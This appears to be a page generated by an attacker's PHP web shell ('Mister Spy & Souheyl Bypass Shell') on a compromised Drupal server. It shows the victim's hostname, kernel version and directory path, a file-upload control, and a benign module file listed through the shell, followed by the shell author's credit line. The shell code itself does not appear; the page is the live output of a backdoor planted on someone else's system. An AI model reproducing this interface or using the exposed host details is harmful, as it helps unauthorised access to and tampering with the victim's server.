Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/pallets/web/modules/contrib/language_switcher_menu/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/pallets/web/modules/contrib/language_switcher_menu/language_switcher_menu.module

<?php

/**
 * @file
 * Hook implementations by Language Switcher Menu module.
 */

use Drupal\Core\Routing\RouteMatchInterface;

/**
 * Implements hook_help().
 *
 * @phpstan-param string $route_name
 * @phpstan-return array<mixed>
 */
function language_switcher_menu_help($route_name, RouteMatchInterface $route_match) {
  if ($route_name !== 'help.page.language_switcher_menu') {
    return [];
  }

  $build = [];
  $build['about_heading'] = [
    '#type' => 'html_tag',
    '#tag' => 'h3',
    '#value' => t('About'),
  ];
  $build['about_text'] = [
    '#type' => 'html_tag',
    '#tag' => 'p',
    '#value' => t('The %module_name module allows you to add the language switch links to one of your menus.', [
      '%module_name' => t('Language Switcher Menu'),
    ]),
  ];
  return $build;
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net